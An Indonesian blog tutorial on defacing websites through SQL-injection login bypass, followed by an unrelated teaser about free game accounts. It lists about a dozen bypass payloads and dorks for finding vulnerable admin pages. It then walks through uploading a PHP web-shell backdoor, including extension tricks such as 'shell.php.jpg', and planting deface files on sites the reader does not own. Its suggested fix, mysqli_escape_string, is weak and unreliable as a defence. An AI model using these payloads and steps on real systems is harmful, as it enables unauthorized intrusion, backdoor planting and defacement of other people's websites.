Tutorial defacte POC Bypass Admin

Sesungguhnya ini tidak jauh berbeda serta masih berhubungan dengan SQL Injection. Bila kita tahu, bug ini membolehkan seseorang attacker buat masuk selaku admin cuma dengan memasukan username serta password contoh semacam or 1=1 tanpa wajib repot- repot semacam halnya melaksanakan ekploitasi web.

Bimbingan Deface Bypass Admin Login

Pengertianya lumayan itu saja. Oiya buat yang masih belum paham ataupun pengen ketahui yang lebih jelas, mengapa ini dapat terjalin? Kemudian dimana letak kesalahan tersebut? Oke, aku telah mempersiapkan postingan selaku rujukan buat dapat kalian baca menimpa perihal ini.

Payload Bypass Admin

Dari sekian banyak query yang bertebaran di internet, disini aku hendak memberikan sebagian query yang kerap aku pakai buat bypass admin login web, antara lain selaku berikut:

admin' or '1'='1

admin' or '1'='1'#

admin' or 1=1 or ''='

'or 1=1 limit 1 -- -+

' or '1'='1

' or 'x'='x

' or 0=0 --

' or 0=0 #

' or 1=1--

' or 'one'='one

'or 1=1-- -

'or''='

Cuma segitu? Iya hanya itu saja, payload bypass admin login tersebut aku pakai dari dini aku memahami/ melaksanakan deface( 2015) hingga saat ini( tetapi telah tidak sering sekali). Nah, bila kalian memiliki payload yang lain bisa jadi dapat di share pada kolom pendapat supaya sahabat yang lain pula pada ketahui.

Baiklah tanpa berlama- lama, saat ini ayo kita ke inti pokok ulasan berikutnya, lestgooo.

Bimbingan Bypass Admin Login Website

Nah, apa saja yang dibutuhkan? Berikut antara lain:

1. Dork

2. Shell Backdoor

3. Script Deface

Uraian:

Dork~ Bila tidak memiliki sasaran kalian dapat mencari web yang terpaut vulnerability bypass admin login dengan dork, contoh dork misalnya.

"inurl:/admin/login.php"

"inurl:/admin/login.php" site:.id

Selebihnya kalian kembangkan lagi ya supaya dapat bisa yang segar.

Shell Backdoor~ File backdoor ini bermanfaat buat edit, upload serta lain sebagainya. Download here

Script Deface~ Bila belum memiliki kalian dapat unduh script deface melalui pencarian Google ataupun kalo dapat ya lebih baik buat sendiri saja.

Baiklah dari apa yang telah aku sebutkan( 3 bahan) tadi, bila kalian telah memiliki. Saat ini ayo kita ikuti sebagian bimbingan dibawah ini.

POC( Profesor End Concept) Bypass Admin Login

Step 1: Eksekusi Target

Hasil dari mencari sasaran dengan dork, kurang lebih semacam ini sasaran yang aku miliki.

http:// sasaran. com/ admin/ index. php

Nah saat ini, tinggal mengeksekusi web tersebut dapat ataupun tidaknya aku bisa masuk ke dashboard panel admin dengan memakai payload yang tadi aku sebutkan diatas serta aku berupaya memakai payload yang admin or 1=1 or=

Dikala terletak di dashboard panel admin login, kalian isikan username: admin or 1=1 or= password: admin or 1=1 or=

Setelah itu tinggal klik pada tombol Login web tersebut. Apabila sukses kalian hendak ditunjukan mengarah ke menu dashboard panel admin web tersebut, serta itu maksudnya kalian telah dapat mengakses segala isi web.

Butuh di ingat, tidak seluruh form login admin web dapat di injeksi dengan metode semacam ini, bila kandas mungkin telah di patch bugnya, kalian dapat coba payload yang lain ataupun cari sasaran yang lainya saja.

Step 2: Upload Shell

Bila kalian telah sukses masuk ke dashboard panel admin web sasaran kalian itu maksudnya saat ini kalian telah dapat upload shell, edit postingan serta lain sebagainya.

Kemudian gimana triknya upload shell backdoor?

Panduan: Bila kita tidak dapat upload shell backdoor disebabkan form upload tersebut cuma memperbolehkan upload file berformat". jpg,. gif,. jpeg" kita dapat mengakalinya dengan bypass extensi shell tersebut. Contoh misalnya semacam ini" shell. php. jpg, shell. jpg. php, shell. jpg. PhP" serta lain sebagainya.

Serta untungnya pada sasaran aku tidak sangat ribet wajib ini itu buat upload shell backdoornya alias tidak terdapat permasalahan sama sekali, kira- kira jika aku jelaskan proses ataupun alur upload shellnya begini.

Cari tempat upload

tempat upload ketemu di bagian menu partners

setelah itu tinggal upload shell backdoor extensi. php

Done tanpa wajib bypass shell.

Bila belum memiliki shell backdoor dapat unduh dari link berikut ini : Unduh Shell Backdoor

Step 3: Deface

Oke, sehabis sukses menanam shell backdoor pada web sasaran. Langkah berikutnya kita tinggal upload file script deface, bila mau menebas index. php tinggal cari aja di bagian directory home page web tersebut. Tetapi disini aku cuma menitipkan file saja tidak mengubah file index. php sama sekalipun.

Gimana bagi kalian gampang bukan? Jangan kurang ingat buat mencobanya sendiri ya tetapi tidak boleh kelewatan, disebabkan beresiko.

Lanjut aja yukk.

Terdapat baiknya jika kita sehabis melaksanakan deface web tersebut, kita pula dapat menolong mereka dengan menutup ataupun patch bug bypass admin login tanpa wajib memberi tahu terlebih dulu, lumayan jalani secara diam- diam serta anggap saja ini selaku bonus dari kalian gitu deh, heker baik hati wkwkk.

Buat triknya ikuti uraian pendek berikut ini.

Metode Patch Bug Bypass Admin Login

Sesungguhnya buat metode melaksanakan patch bug bypass admin pada web itu sangat gampang, kalian cuma lumayan dengan meningkatkan perintah mysqli_escape_string.

Berikut ini contoh source kode yang mempunyai vulnerability bypass admin login, aku hendak ambil bagian tertentu saja ya.

<?php
$message = "";
if(isset($_POST['submit'])) {
$username = ($_POST['username']);
$password = ($_POST['password']);

kode bla bla bla
kode bla bla bla
kode bla bla bla

} else {
$message = "Username and Password is not matched";
}
}
?>

Bila kita pahami pada source kode diatas, berikut ini merupakan kode dimana yang jadi permasalahan ialah dapat di bypass admin login.

$username = ($_POST['username']);
$password = ($_POST['password']);

Uraian begini, kita ketahui kalau kode tersebut tidak terdapat filterisasi kepribadian yang menyebabkan terdapatnya bug dimana seseorang attacker dapat bisa memasukan query injeksi serta bisa masuk ke dashboard panel admin sesuatu web.

Nah, hingga dari itu kita tambahkan saja kode ataupun guna mysqli_escape_string di bagian kode yang bisa menimbulkan bug tadi, bila digabungkan triknya semacam ini kodenya.

$username = mysqli_escape_string($con, $_POST['username']);
$password = mysqli_escape_string($con, $_POST['password']);

Telah mengerti kan triknya? Bila telah, Bagus deh!

Jadi sehabis meningkatkan filter pada bagian kode$username serta$password dengan guna mysqli_escape_string tersebut, seseorang attacker tidak hendak dapat menginjeksi admin login, mantap haha.

Penutup:

Demikian postingan simpel yang aku tulis ini, tentang Bimbingan Deface Bypass Admin Login serta Metode Patch Bug Bypass Admin bersumber pada pengalaman yang telah aku pelajari, mudah- mudahan bisa bermanfaat serta berguna buat seluruh orang.

Update! Kumpulan akun PES 2021 mobile gratis terbaru

Halo sobat tamatekno, di artikel ini ada yang spesial nih. Ya di artikel ini saya ingin berbagi beberapa akun PES 2021 mobil gratis kepada sobat tamatekno, karena kebetulan akun saya banyak yang tersimpan di email. Ada 20an lebih akun yang akan saya bagikan kepada sobat semua, daripada ngga dimainkan karena saya mau fokus kuliah dan ngeblog. Akun PES yang ingin saya bagikan bukan akun kaleng-kaleng yang sob, karena akun-akun saya merupakan akun old dan terdapat banyak ICONIC dan legend. Selain itu akun PES gratis yang ingin saya bagikan juga memiliki aset yang melimpah, khususnya GP dan trainer. Untuk koin undah saya pake buat roll ICONIC kemaren, wkwk. Nah buat sobat yang ingin mendapatkan akun PES gratis, sobat bisa mengambilnya dari beberapa akun di bawah ini. Akun-akunya sudah saya buatkan Konami ID semua yah, jadi ngga ada yang menggunakan Gmail atau google play. Dan sobat harus cepat mengamankan akunya jika sobat dapet, biar ngga di amankan oleh orang lain. Yang terakhir ...

Baca selengkapnya

Bahas Trending

Cari Blog Ini